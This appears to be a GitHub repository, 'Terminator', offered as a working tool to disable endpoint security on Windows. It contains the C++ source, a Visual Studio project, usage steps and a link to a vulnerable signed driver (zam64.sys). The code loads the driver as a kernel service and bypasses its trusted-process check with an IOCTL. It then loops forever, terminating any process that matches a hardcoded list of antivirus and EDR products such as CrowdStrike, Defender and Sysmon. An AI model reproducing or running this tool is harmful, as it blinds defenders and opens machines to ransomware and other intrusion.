├── .gitattributes
├── .gitignore
├── README.md
├── Terminator.sln
├── Terminator
├── Terminator.cpp
├── Terminator.vcxproj
└── Terminator.vcxproj.filters
└── vDriver
├── README.md
└── Terminator.sys
/.gitattributes:
--------------------------------------------------------------------------------
1 | ###############################################################################
2 | # Set default behavior to automatically normalize line endings.
3 | ###############################################################################
4 | * text=auto
5 |
6 | ###############################################################################
7 | # Set default behavior for command prompt diff.
8 | #
9 | # This is need for earlier builds of msysgit that does not have it on by
10 | # default for csharp files.
11 | # Note: This is only used by command line
12 | ###############################################################################
13 | #*.cs diff=csharp
14 |
15 | ###############################################################################
16 | # Set the merge driver for project and solution files
17 | #
18 | # Merging from the command prompt will add diff markers to the files if there
19 | # are conflicts (Merging from VS is not affected by the settings below, in VS
20 | # the diff markers are never inserted). Diff markers may cause the following
21 | # file extensions to fail to load in VS. An alternative would be to treat
22 | # these files as binary and thus will always conflict and require user
23 | # intervention with every merge. To do so, just uncomment the entries below
24 | ###############################################################################
25 | #*.sln merge=binary
26 | #*.csproj merge=binary
27 | #*.vbproj merge=binary
28 | #*.vcxproj merge=binary
29 | #*.vcproj merge=binary
30 | #*.dbproj merge=binary
31 | #*.fsproj merge=binary
32 | #*.lsproj merge=binary
33 | #*.wixproj merge=binary
34 | #*.modelproj merge=binary
35 | #*.sqlproj merge=binary
36 | #*.wwaproj merge=binary
37 |
38 | ###############################################################################
39 | # behavior for image files
40 | #
41 | # image files are treated as binary by default.
42 | ###############################################################################
43 | #*.jpg binary
44 | #*.png binary
45 | #*.gif binary
46 |
47 | ###############################################################################
48 | # diff behavior for common document formats
49 | #
50 | # Convert binary document formats to text before diffing them. This feature
51 | # is only available from the command line. Turn it on by uncommenting the
52 | # entries below.
53 | ###############################################################################
54 | #*.doc diff=astextplain
55 | #*.DOC diff=astextplain
56 | #*.docx diff=astextplain
57 | #*.DOCX diff=astextplain
58 | #*.dot diff=astextplain
59 | #*.DOT diff=astextplain
60 | #*.pdf diff=astextplain
61 | #*.PDF diff=astextplain
62 | #*.rtf diff=astextplain
63 | #*.RTF diff=astextplain
64 |
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
1 | ## Ignore Visual Studio temporary files, build results, and
2 | ## files generated by popular Visual Studio add-ons.
3 | ##
4 | ## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore
5 |
6 | # User-specific files
7 | *.rsuser
8 | *.suo
9 | *.user
10 | *.userosscache
11 | *.sln.docstates
12 |
13 | # User-specific files (MonoDevelop/Xamarin Studio)
14 | *.userprefs
15 |
16 | # Mono auto generated files
17 | mono_crash.*
18 |
19 | # Build results
20 | [Dd]ebug/
21 | [Dd]ebugPublic/
22 | [Rr]elease/
23 | [Rr]eleases/
24 | x64/
25 | x86/
26 | [Ww][Ii][Nn]32/
27 | [Aa][Rr][Mm]/
28 | [Aa][Rr][Mm]64/
29 | bld/
30 | [Bb]in/
31 | [Oo]bj/
32 | [Oo]ut/
33 | [Ll]og/
34 | [Ll]ogs/
35 |
36 | # Visual Studio 2015/2017 cache/options directory
37 | .vs/
38 | # Uncomment if you have tasks that create the project's static files in wwwroot
39 | #wwwroot/
40 |
41 | # Visual Studio 2017 auto generated files
42 | Generated\ Files/
43 |
44 | # MSTest test Results
45 | [Tt]est[Rr]esult*/
46 | [Bb]uild[Ll]og.*
47 |
48 | # NUnit
49 | *.VisualState.xml
50 | TestResult.xml
51 | nunit-*.xml
52 |
53 | # Build Results of an ATL Project
54 | [Dd]ebugPS/
55 | [Rr]eleasePS/
56 | dlldata.c
57 |
58 | # Benchmark Results
59 | BenchmarkDotNet.Artifacts/
60 |
61 | # .NET Core
62 | project.lock.json
63 | project.fragment.lock.json
64 | artifacts/
65 |
66 | # ASP.NET Scaffolding
67 | ScaffoldingReadMe.txt
68 |
69 | # StyleCop
70 | StyleCopReport.xml
71 |
72 | # Files built by Visual Studio
73 | *_i.c
74 | *_p.c
75 | *_h.h
76 | *.ilk
77 | *.meta
78 | *.obj
79 | *.iobj
80 | *.pch
81 | *.pdb
82 | *.ipdb
83 | *.pgc
84 | *.pgd
85 | *.rsp
86 | *.sbr
87 | *.tlb
88 | *.tli
89 | *.tlh
90 | *.tmp
91 | *.tmp_proj
92 | *_wpftmp.csproj
93 | *.log
94 | *.vspscc
95 | *.vssscc
96 | .builds
97 | *.pidb
98 | *.svclog
99 | *.scc
100 |
101 | # Chutzpah Test files
102 | _Chutzpah*
103 |
104 | # Visual C++ cache files
105 | ipch/
106 | *.aps
107 | *.ncb
108 | *.opendb
109 | *.opensdf
110 | *.sdf
111 | *.cachefile
112 | *.VC.db
113 | *.VC.VC.opendb
114 |
115 | # Visual Studio profiler
116 | *.psess
117 | *.vsp
118 | *.vspx
119 | *.sap
120 |
121 | # Visual Studio Trace Files
122 | *.e2e
123 |
124 | # TFS 2012 Local Workspace
125 | $tf/
126 |
127 | # Guidance Automation Toolkit
128 | *.gpState
129 |
130 | # ReSharper is a .NET coding add-in
131 | _ReSharper*/
132 | *.[Rr]e[Ss]harper
133 | *.DotSettings.user
134 |
135 | # TeamCity is a build add-in
136 | _TeamCity*
137 |
138 | # DotCover is a Code Coverage Tool
139 | *.dotCover
140 |
141 | # AxoCover is a Code Coverage Tool
142 | .axoCover/*
143 | !.axoCover/settings.json
144 |
145 | # Coverlet is a free, cross platform Code Coverage Tool
146 | coverage*.json
147 | coverage*.xml
148 | coverage*.info
149 |
150 | # Visual Studio code coverage results
151 | *.coverage
152 | *.coveragexml
153 |
154 | # NCrunch
155 | _NCrunch_*
156 | .*crunch*.local.xml
157 | nCrunchTemp_*
158 |
159 | # MightyMoose
160 | *.mm.*
161 | AutoTest.Net/
162 |
163 | # Web workbench (sass)
164 | .sass-cache/
165 |
166 | # Installshield output folder
167 | [Ee]xpress/
168 |
169 | # DocProject is a documentation generator add-in
170 | DocProject/buildhelp/
171 | DocProject/Help/*.HxT
172 | DocProject/Help/*.HxC
173 | DocProject/Help/*.hhc
174 | DocProject/Help/*.hhk
175 | DocProject/Help/*.hhp
176 | DocProject/Help/Html2
177 | DocProject/Help/html
178 |
179 | # Click-Once directory
180 | publish/
181 |
182 | # Publish Web Output
183 | *.[Pp]ublish.xml
184 | *.azurePubxml
185 | # Note: Comment the next line if you want to checkin your web deploy settings,
186 | # but database connection strings (with potential passwords) will be unencrypted
187 | *.pubxml
188 | *.publishproj
189 |
190 | # Microsoft Azure Web App publish settings. Comment the next line if you want to
191 | # checkin your Azure Web App publish settings, but sensitive information contained
192 | # in these scripts will be unencrypted
193 | PublishScripts/
194 |
195 | # NuGet Packages
196 | *.nupkg
197 | # NuGet Symbol Packages
198 | *.snupkg
199 | # The packages folder can be ignored because of Package Restore
200 | **/[Pp]ackages/*
201 | # except build/, which is used as an MSBuild target.
202 | !**/[Pp]ackages/build/
203 | # Uncomment if necessary however generally it will be regenerated when needed
204 | #!**/[Pp]ackages/repositories.config
205 | # NuGet v3's project.json files produces more ignorable files
206 | *.nuget.props
207 | *.nuget.targets
208 |
209 | # Microsoft Azure Build Output
210 | csx/
211 | *.build.csdef
212 |
213 | # Microsoft Azure Emulator
214 | ecf/
215 | rcf/
216 |
217 | # Windows Store app package directories and files
218 | AppPackages/
219 | BundleArtifacts/
220 | Package.StoreAssociation.xml
221 | _pkginfo.txt
222 | *.appx
223 | *.appxbundle
224 | *.appxupload
225 |
226 | # Visual Studio cache files
227 | # files ending in .cache can be ignored
228 | *.[Cc]ache
229 | # but keep track of directories ending in .cache
230 | !?*.[Cc]ache/
231 |
232 | # Others
233 | ClientBin/
234 | ~$*
235 | *~
236 | *.dbmdl
237 | *.dbproj.schemaview
238 | *.jfm
239 | *.pfx
240 | *.publishsettings
241 | orleans.codegen.cs
242 |
243 | # Including strong name files can present a security risk
244 | # (https://github.com/github/gitignore/pull/2483#issue-259490424)
245 | #*.snk
246 |
247 | # Since there are multiple workflows, uncomment next line to ignore bower_components
248 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
249 | #bower_components/
250 |
251 | # RIA/Silverlight projects
252 | Generated_Code/
253 |
254 | # Backup & report files from converting an old project file
255 | # to a newer Visual Studio version. Backup files are not needed,
256 | # because we have git ;-)
257 | _UpgradeReport_Files/
258 | Backup*/
259 | UpgradeLog*.XML
260 | UpgradeLog*.htm
261 | ServiceFabricBackup/
262 | *.rptproj.bak
263 |
264 | # SQL Server files
265 | *.mdf
266 | *.ldf
267 | *.ndf
268 |
269 | # Business Intelligence projects
270 | *.rdl.data
271 | *.bim.layout
272 | *.bim_*.settings
273 | *.rptproj.rsuser
274 | *- [Bb]ackup.rdl
275 | *- [Bb]ackup ([0-9]).rdl
276 | *- [Bb]ackup ([0-9][0-9]).rdl
277 |
278 | # Microsoft Fakes
279 | FakesAssemblies/
280 |
281 | # GhostDoc plugin setting file
282 | *.GhostDoc.xml
283 |
284 | # Node.js Tools for Visual Studio
285 | .ntvs_analysis.dat
286 | node_modules/
287 |
288 | # Visual Studio 6 build log
289 | *.plg
290 |
291 | # Visual Studio 6 workspace options file
292 | *.opt
293 |
294 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.)
295 | *.vbw
296 |
297 | # Visual Studio LightSwitch build output
298 | **/*.HTMLClient/GeneratedArtifacts
299 | **/*.DesktopClient/GeneratedArtifacts
300 | **/*.DesktopClient/ModelManifest.xml
301 | **/*.Server/GeneratedArtifacts
302 | **/*.Server/ModelManifest.xml
303 | _Pvt_Extensions
304 |
305 | # Paket dependency manager
306 | .paket/paket.exe
307 | paket-files/
308 |
309 | # FAKE - F# Make
310 | .fake/
311 |
312 | # CodeRush personal settings
313 | .cr/personal
314 |
315 | # Python Tools for Visual Studio (PTVS)
316 | __pycache__/
317 | *.pyc
318 |
319 | # Cake - Uncomment if you are using it
320 | # tools/**
321 | # !tools/packages.config
322 |
323 | # Tabs Studio
324 | *.tss
325 |
326 | # Telerik's JustMock configuration file
327 | *.jmconfig
328 |
329 | # BizTalk build output
330 | *.btp.cs
331 | *.btm.cs
332 | *.odx.cs
333 | *.xsd.cs
334 |
335 | # OpenCover UI analysis results
336 | OpenCover/
337 |
338 | # Azure Stream Analytics local run output
339 | ASALocalRun/
340 |
341 | # MSBuild Binary and Structured Log
342 | *.binlog
343 |
344 | # NVidia Nsight GPU debugger configuration file
345 | *.nvuser
346 |
347 | # MFractors (Xamarin productivity tool) working folder
348 | .mfractor/
349 |
350 | # Local History for Visual Studio
351 | .localhistory/
352 |
353 | # BeatPulse healthcheck temp database
354 | healthchecksdb
355 |
356 | # Backup folder for Package Reference Convert tool in Visual Studio 2017
357 | MigrationBackup/
358 |
359 | # Ionide (cross platform F# VS Code tools) working folder
360 | .ionide/
361 |
362 | # Fody - auto-generated XML schema
363 | FodyWeavers.xsd
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 |
2 |
3 | 
4 |
5 |
6 |
7 | # Terminator
8 |
9 | * Reproducing Spyboy technique, which involves terminating all EDR/XDR/AVs processes by abusing the zam64.sys driver
10 | * Spyboy was selling the Terminator software at a price of $3,000 [for more detail](https://www.bleepingcomputer.com/news/security/terminator-antivirus-killer-is-a-vulnerable-windows-driver-in-disguise/)
11 | * the sample is sourced from [loldrivers](https://www.loldrivers.io/drivers/49920621-75d5-40fc-98b0-44f8fa486dcc/)
12 | # usage
13 |
14 | * the compiled version can be found [HERE](https://github.com/ZeroMemoryEx/Terminator/releases)
15 | * Place the driver `Terminator.sys` in the same path as the executable
16 | * run the program as an administrator
17 | * keep the program running to prevent the service from restarting the anti-malwares
18 |
19 | 
20 |
21 | # technical details
22 |
23 | * The driver contains some protectiion mechanism that only allow trusted Process IDs to send IOCTLs, Without adding your process ID to the trusted list, you will receive an 'Access Denied' message every time. However, this can be easily bypassed by sending an IOCTL with our PID to be added to the trusted list, which will then permit us to control numerous critical IOCTLs
24 |
25 | 
26 |
--------------------------------------------------------------------------------
/Terminator.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 17
4 | VisualStudioVersion = 17.5.33530.505
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Terminator", "Terminator\Terminator.vcxproj", "{9A279A0B-357E-4FB7-AB1F-919CDF6619C1}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|x64 = Debug|x64
11 | Debug|x86 = Debug|x86
12 | Release|x64 = Release|x64
13 | Release|x86 = Release|x86
14 | EndGlobalSection
15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | {9A279A0B-357E-4FB7-AB1F-919CDF6619C1}.Debug|x64.ActiveCfg = Debug|x64
17 | {9A279A0B-357E-4FB7-AB1F-919CDF6619C1}.Debug|x64.Build.0 = Debug|x64
18 | {9A279A0B-357E-4FB7-AB1F-919CDF6619C1}.Debug|x86.ActiveCfg = Debug|Win32
19 | {9A279A0B-357E-4FB7-AB1F-919CDF6619C1}.Debug|x86.Build.0 = Debug|Win32
20 | {9A279A0B-357E-4FB7-AB1F-919CDF6619C1}.Release|x64.ActiveCfg = Release|x64
21 | {9A279A0B-357E-4FB7-AB1F-919CDF6619C1}.Release|x64.Build.0 = Release|x64
22 | {9A279A0B-357E-4FB7-AB1F-919CDF6619C1}.Release|x86.ActiveCfg = Release|Win32
23 | {9A279A0B-357E-4FB7-AB1F-919CDF6619C1}.Release|x86.Build.0 = Release|Win32
24 | EndGlobalSection
25 | GlobalSection(SolutionProperties) = preSolution
26 | HideSolutionNode = FALSE
27 | EndGlobalSection
28 | GlobalSection(ExtensibilityGlobals) = postSolution
29 | SolutionGuid = {F0897BA4-0B7F-45F9-B91B-595E6A4623FE}
30 | EndGlobalSection
31 | EndGlobal
32 |
--------------------------------------------------------------------------------
/Terminator/Terminator.cpp:
--------------------------------------------------------------------------------
1 | #define _CRT_SECURE_NO_WARNINGS
2 | #include
3 | #include
4 | #include
5 |
6 | #define IOCTL_REGISTER_PROCESS 0x80002010
7 |
8 | #define IOCTL_TERMINATE_PROCESS 0x80002048
9 |
10 | const char* g_serviceName = "Terminator";
11 |
12 | const char* const g_edrlist[] = {
13 | "activeconsole", "anti malware", "anti-malware",
14 | "antimalware", "anti virus", "anti-virus",
15 | "antivirus", "appsense", "authtap",
16 | "avast", "avecto", "canary",
17 | "carbonblack", "carbon black", "cb.exe",
18 | "ciscoamp", "cisco amp", "countercept",
19 | "countertack", "cramtray", "crssvc",
20 | "crowdstrike", "csagent", "csfalcon",
21 | "csshell", "cybereason", "cyclorama",
22 | "cylance", "cyoptics", "cyupdate",
23 | "cyvera", "cyserver", "cytray",
24 | "darktrace", "defendpoint", "defender",
25 | "eectrl", "elastic", "endgame",
26 | "f-secure", "forcepoint", "fireeye",
27 | "groundling", "GRRservic", "inspector",
28 | "ivanti", "kaspersky", "lacuna",
29 | "logrhythm", "malware", "mandiant",
30 | "mcafee", "morphisec", "msascuil",
31 | "msmpeng", "nissrv", "omni",
32 | "omniagent", "osquery", "palo alto networks",
33 | "pgeposervice", "pgsystemtray", "privilegeguard",
34 | "procwall", "protectorservic", "qradar",
35 | "redcloak", "secureworks", "securityhealthservice",
36 | "semlaunchsv", "sentinel", "sepliveupdat",
37 | "sisidsservice", "sisipsservice", "sisipsutil",
38 | "smc.exe", "smcgui", "snac64",
39 | "sophos", "splunk", "srtsp",
40 | "symantec", "symcorpu", "symefasi",
41 | "sysinternal", "sysmon", "tanium",
42 | "tda.exe", "tdawork", "tpython",
43 | "vectra", "wincollect", "windowssensor",
44 | "wireshark", "threat", "xagt.exe",
45 | "xagtnotif.exe" ,"mssense" };
46 |
47 | int g_edrlistSize = sizeof(g_edrlist) / sizeof(g_edrlist[0]);
48 |
49 | BOOL loadDriver(char* driverPath) {
50 | SC_HANDLE hSCM, hService;
51 |
52 | // Open a handle to the SCM database
53 | hSCM = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
54 | if (hSCM == NULL)
55 | return (1);
56 |
57 | // Check if the service already exists
58 | hService = OpenServiceA(hSCM, g_serviceName, SERVICE_ALL_ACCESS);
59 | if (hService != NULL) {
60 | printf("Service already exists.\n");
61 |
62 | // Start the service if it"s not running
63 | SERVICE_STATUS serviceStatus;
64 | if (!QueryServiceStatus(hService, &serviceStatus)) {
65 | CloseServiceHandle(hService);
66 | CloseServiceHandle(hSCM);
67 | return (1);
68 | }
69 |
70 | if (serviceStatus.dwCurrentState == SERVICE_STOPPED) {
71 | if (!StartServiceA(hService, 0, nullptr)) {
72 | CloseServiceHandle(hService);
73 | CloseServiceHandle(hSCM);
74 | return (1);
75 | }
76 |
77 | printf("Starting service...\n");
78 | }
79 |
80 | CloseServiceHandle(hService);
81 | CloseServiceHandle(hSCM);
82 | return (0);
83 | }
84 |
85 | // Create the service
86 | hService = CreateServiceA(hSCM, g_serviceName, g_serviceName, SERVICE_ALL_ACCESS,
87 | SERVICE_KERNEL_DRIVER, SERVICE_DEMAND_START,
88 | SERVICE_ERROR_IGNORE, driverPath, NULL, NULL, NULL,
89 | NULL, NULL);
90 |
91 | if (hService == NULL) {
92 | CloseServiceHandle(hSCM);
93 | return (1);
94 | }
95 |
96 | printf("Service created successfully.\n");
97 |
98 | // Start the service
99 | if (!StartServiceA(hService, 0, nullptr)) {
100 | CloseServiceHandle(hService);
101 | CloseServiceHandle(hSCM);
102 | return (1);
103 | }
104 |
105 | printf("Starting service...\n");
106 |
107 | CloseServiceHandle(hService);
108 | CloseServiceHandle(hSCM);
109 |
110 | return (0);
111 | }
112 |
113 | char* toLowercase(const char* str) {
114 | char* lower_str = _strdup(str);
115 | for (int i = 0; lower_str[i]; i++) {
116 | lower_str[i] = tolower((unsigned char)lower_str[i]);
117 | }
118 | return lower_str;
119 | }
120 |
121 | int isInEdrlist(const char* pn) {
122 | char* tempv = toLowercase(pn);
123 | for (int i = 0; i < g_edrlistSize; i++) {
124 | if (strstr(tempv, g_edrlist[i]) != NULL) {
125 | free(tempv);
126 | return (1);
127 | }
128 | }
129 | free(tempv);
130 | return (0);
131 | }
132 |
133 | DWORD
134 | checkEDRProcesses(HANDLE hDevice) {
135 | unsigned int procId = 0;
136 | unsigned int pOutbuff = 0;
137 | DWORD bytesRet = 0;
138 | int ecount = 0;
139 | HANDLE hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
140 |
141 | if (hSnap != INVALID_HANDLE_VALUE) {
142 | PROCESSENTRY32 pE;
143 | pE.dwSize = sizeof(pE);
144 |
145 | if (Process32First(hSnap, &pE)) {
146 | do {
147 | char exeName[MAX_PATH];
148 | wcstombs(exeName, pE.szExeFile, MAX_PATH);
149 |
150 | if (isInEdrlist(exeName)) {
151 | procId = (unsigned int)pE.th32ProcessID;
152 | if (!DeviceIoControl(hDevice, IOCTL_TERMINATE_PROCESS, &procId,
153 | sizeof(procId), &pOutbuff, sizeof(pOutbuff),
154 | &bytesRet, NULL))
155 | printf("faild to terminate %ws !!\n", pE.szExeFile);
156 | else {
157 | printf("terminated %ws\n", pE.szExeFile);
158 | ecount++;
159 | }
160 | }
161 | } while (Process32Next(hSnap, &pE));
162 | }
163 | CloseHandle(hSnap);
164 | }
165 | return (ecount);
166 | }
167 |
168 | int main(void) {
169 | WIN32_FIND_DATAA fileData;
170 | HANDLE hFind;
171 | char FullDriverPath[MAX_PATH];
172 | BOOL once = 1;
173 |
174 | hFind = FindFirstFileA("Terminator.sys", &fileData);
175 |
176 | if (hFind != INVALID_HANDLE_VALUE) { // file is found
177 | if (GetFullPathNameA(fileData.cFileName, MAX_PATH, FullDriverPath, NULL) !=
178 | 0) { // full path is found
179 | printf("driver path: %s\n", FullDriverPath);
180 | }
181 | else {
182 | printf("path not found !!\n");
183 | return (-1);
184 | }
185 | }
186 | else {
187 | printf("driver not found !!\n");
188 | return (-1);
189 | }
190 | printf("Loading %s driver .. \n", fileData.cFileName);
191 |
192 | if (loadDriver(FullDriverPath)) {
193 | printf("faild to load driver ,try to run the program as administrator!!\n");
194 | return (-1);
195 | }
196 |
197 | printf("driver loaded successfully !!\n");
198 |
199 | HANDLE hDevice =
200 | CreateFile(L"\\\\.\\ZemanaAntiMalware", GENERIC_WRITE | GENERIC_READ, 0,
201 | NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
202 |
203 | if (hDevice == INVALID_HANDLE_VALUE) {
204 | printf("Failed to open handle to driver !! ");
205 | return (-1);
206 | }
207 |
208 | unsigned int input = GetCurrentProcessId();
209 |
210 | if (!DeviceIoControl(hDevice, IOCTL_REGISTER_PROCESS, &input, sizeof(input),
211 | NULL, 0, NULL, NULL)) {
212 | printf("Failed to register the process in the trusted list %X !!\n",
213 | IOCTL_REGISTER_PROCESS);
214 | CloseHandle(hDevice);
215 | return (-1);
216 | }
217 |
218 | printf("process registed in the trusted list %X !!\n",
219 | IOCTL_REGISTER_PROCESS);
220 |
221 | printf(
222 | "Terminating ALL EDR/XDR/AVs ..\nkeep the program running to prevent "
223 | "windows service from restarting them\n");
224 |
225 | for (;;) {
226 | if (!checkEDRProcesses(hDevice))
227 | Sleep(1200);
228 | else
229 | Sleep(700);
230 | }
231 |
232 | system("pause");
233 |
234 | CloseHandle(hDevice);
235 |
236 | return 0;
237 | }
238 |
--------------------------------------------------------------------------------
/Terminator/Terminator.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | 16.0
23 | Win32Proj
24 | {9a279a0b-357e-4fb7-ab1f-919cdf6619c1}
25 | Terminator
26 | 10.0
27 |
28 |
29 |
30 | Application
31 | true
32 | v143
33 | Unicode
34 |
35 |
36 | Application
37 | false
38 | v143
39 | true
40 | Unicode
41 |
42 |
43 | Application
44 | true
45 | v143
46 | Unicode
47 |
48 |
49 | Application
50 | false
51 | v143
52 | true
53 | Unicode
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 |
75 | Level3
76 | true
77 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
78 | true
79 |
80 |
81 | Console
82 | true
83 |
84 |
85 |
86 |
87 | Level3
88 | true
89 | true
90 | true
91 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
92 | true
93 |
94 |
95 | Console
96 | true
97 | true
98 | true
99 |
100 |
101 |
102 |
103 | Level3
104 | true
105 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
106 | true
107 | MultiThreadedDebug
108 |
109 |
110 | Console
111 | true
112 |
113 |
114 |
115 |
116 | Level3
117 | true
118 | true
119 | true
120 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
121 | true
122 |
123 |
124 | Console
125 | true
126 | true
127 | true
128 |
129 |
130 |
131 |
132 |
133 |
134 |
135 |
136 |
--------------------------------------------------------------------------------
/Terminator/Terminator.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/vDriver/README.md:
--------------------------------------------------------------------------------
1 |
2 | * place the driver in the same directory as the executable, and run the executable as an administrator.
3 |
--------------------------------------------------------------------------------
/vDriver/Terminator.sys:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ZeroMemoryEx/Terminator/a844482c947f29c345c3bfd333958d09bdd789fc/vDriver/Terminator.sys
--------------------------------------------------------------------------------